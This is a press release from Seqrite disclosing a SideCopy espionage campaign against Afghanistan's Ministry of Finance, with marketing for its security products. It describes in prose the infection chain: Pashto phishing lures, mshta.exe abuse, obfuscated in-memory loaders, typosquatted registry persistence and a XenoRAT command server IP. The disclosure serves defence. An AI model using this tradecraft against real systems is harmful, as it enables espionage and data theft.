Seqrite Uncovers Operation XENOFISCAL: Pakistan-Linked SideCopy Group Deploys Persistent XenoRAT Against Afghanistan’s Ministry of Finance

June 9, 2026

Pune, 05th June, 2026: A new chapter in South Asia’s cyber espionage story is unfolding far from the front page, inside finance ministries and provincial revenue offices. Seqrite, the enterprise security arm of Quick Heal Technologies Limited, a global provider of cybersecurity solutions, has disclosed details of Operation XENOFISCAL – a targeted cyber espionage campaign attributed with medium-to-high confidence to SideCopy, a Pakistan-linked advanced persistent threat (APT) group operating under the broader Transparent Tribe/APT36 umbrella.

Researchers at Seqrite Labs, India’s largest malware analysis facility, discovered that the operation implants a persistent variant of XenoRAT 1.8.7 across Afghanistan’s Ministry of Finance (MoF) and provincial revenue directorates, using carefully crafted Pashto-language spear-phishing lures and a multi-stage, largely fileless infection chain that abuses legitimate Windows binaries to bypass traditional defenses.

The campaign begins with a spear-phishing email carrying a ZIP archive that appears, at first glance, to be a routine internal document. Inside sits a malicious Windows shortcut (LNK) file whose Pashto filename translates to “List of Employees Who Were Introduced to the Intellectual and Psychological Warfare Seminar,” a theme carefully chosen to match Afghanistan’s government context and staff workflows. Once a targeted official executes the shortcut, the LNK abuses the legitimate Windows utility mshta.exe as a Living-off-the-Land Binary to silently fetch a remote HTML Application (HTA) from a compromised Afghan education domain, executing heavily obfuscated JavaScript directly in memory instead of writing obvious binaries to disk.

From there, the campaign escalates through multiple in-memory stages. A heavily obfuscated JScript payload reconstructs malicious components using hex-encoded arrays, custom Base64 routines, and .NET deserialization, ultimately loading a .NET DLL-based first-stage loader. While the victim is presented with a realistic decoy document – a detailed Afghan Ministry of Finance provincial staff directory listing finance directors, revenue chiefs, and mobile numbers for all 34 provinces – the loader stealthily creates a new directory under the Public user profile, establishes registry-based persistence under a typosquatted “Edgre” entry designed to mimic Microsoft Edge, and prepares the environment for the final payload.

In the last stage, the infection deploys XenoRAT 1.8.7, an open-source remote access trojan configured to communicate over TCP with attacker-controlled infrastructure hosted on European bulletproof servers, including the command-and-control IP 185.235.137.106. Once active, XenoRAT offers the operator a full post-exploitation toolkit, including remote command execution, dynamic DLL loading, file exfiltration, scheduled task creation, antivirus reconnaissance, SOCKS5 proxy tunneling, keystroke logging, screenshot capture, clipboard monitoring, webcam and microphone surveillance, and the ability to remove persistence traces or uninstall itself to erase evidence. By relying on staged, in-memory execution and trusted components such as mshta.exe, the operation leaves minimal forensic footprint on disk while maintaining durable, high-value access to fiscal and personnel data inside Afghan government systems.

Researchers at Seqrite Labs noted that Operation XENOFISCAL is part of a broader regional pattern in which SideCopy and related clusters adopt customized open-source RATs, weaponise local-language lures, and stage infrastructure on foreign soil to complicate attribution. The campaign’s use of a compromised Afghan educational domain as a delivery platform, combined with a genuine MoF staff directory as the decoy document, underlines how much prior reconnaissance and data harvesting went into tailoring the operation for maximum credibility and impact.

For governments and critical institutions across the region, the implications stretch beyond endpoint compromise. Ministries of finance, tax authorities, and provincial revenue offices manage deeply sensitive data: national budgets, revenue flows, payroll, contracts, and extensive records on individual officials and vendors. Compromise at this layer is not only an intelligence coup; it can become a gateway for corruption, coercion, and strategic economic disruption. In India, where similar fiscal, identity and benefits data is central to governance, the Digital Personal Data Protection (DPDP) Act, 2023 raises the stakes further by placing clear accountability on Data Fiduciaries when personal data is exposed or misused through such intrusions.

In this environment, advanced cybersecurity solutions such as Seqrite Data Privacy and Digital Risk Protection Services (DRPS) have become must-have capabilities for government departments and enterprises that want to move beyond perimeter-centric security and truly protect what attackers are after – the data itself. Seqrite also offers a Digital Risks Calculator, which enables organizations to assess their potential exposure across digital assets, identify areas of elevated risk, and prioritize mitigation efforts. Used alongside Seqrite’s endpoint, server, and gateway protections, these help close the gap that campaigns like Operation XENOFISCAL systematically exploit: poorly inventoried, overexposed, and weakly governed information assets.

All Seqrite products are aligned with the provisions of the DPDP Act, allowing government and enterprise customers to strengthen cyber defense and data protection in tandem rather than as separate initiatives. Seqrite’s portfolio – from Endpoint and Server Security to Threat Intelligence and Ransomware Recovery as a Service (RRaaS) – is designed to give defenders both internal visibility and external situational awareness in the face of increasingly targeted, politically motivated operations.

About Quick Heal Technologies Limited

Quick Heal Technologies Ltd is a global cybersecurity solutions provider. Each Quick Heal product is designed to simplify IT security management across the length and depth of devices and on multiple platforms. They are customized to suit consumers, small businesses, government establishments, and corporate houses. Over a span of nearly 3 decades, the company’s R&D has focused on computer and network security solutions.

The current portfolio of cloud-based security and advanced machine learning-enabled solutions stops threats, attacks, and malicious traffic before it strikes. This considerably reduces the system resource usage. The security solutions are indigenously developed in India. Quick Heal Antivirus Solutions, Quick Heal Scan Engine, and the entire range of Quick Heal products are proprietary items of Quick Heal Technologies Ltd. Recently, unveiled Quick Heal pioneers India’s first fraud prevention solution, AntiFraud.AI, available for Android, iOS, and Windows. For more information, please visit: www.quickheal.co.in AntiFraud.AI – www.quickheal.co.in/quick-heal-antifraud

About Seqrite

Seqrite is a leading enterprise cybersecurity solutions provider. With a focus on simplifying cybersecurity, Seqrite delivers comprehensive solutions and services through our patented, AI/ML-powered tech stack to protect businesses against the latest threats by securing devices, applications, networks, cloud, data, and identity. Seqrite is the Enterprise arm of the global cybersecurity brand, Quick Heal Technologies Limited, the only listed cybersecurity products and solutions company in India.

We are the first and only Indian company to have solidified India’s position on the global map by collaborating with the Govt. of the USA on its NIST NCCoE’s Data Classification project. We are differentiated by our easy-to-deploy, seamless-to-integrate comprehensive solutions providing the highest level of protection against emerging and sophisticated threats powered by state-of-the-art threat intelligence and playbooks backed by world-class service provided by best-in-class security experts at India’s largest malware analysis lab – Seqrite Labs. We are the only Indian full-stack company aligned with CSMA architecture recommendations, offering award-winning Endpoint Protection, Enterprise Mobile Device Management, Data Privacy, Zero Trust Network Access, and many more. Seqrite Data Privacy Management solution enables organizations to stay fully compliant with the DPDP Act and global regulations. We have recently launched Digital Risk Protection Services for external threat monitoring and Ransomware Recovery as a Service for rapid, guided restoration after ransomware attacks. Seqrite has also unveiled SIA, an LLM-powered security co-pilot built on GoDeep.AI to help enterprises navigate growing cyber complexity with intelligent, conversational analysis.

Today, 30,000+ enterprises in more than 70 countries trust Seqrite with their cybersecurity needs. For more information, please visit: www.seqrite.com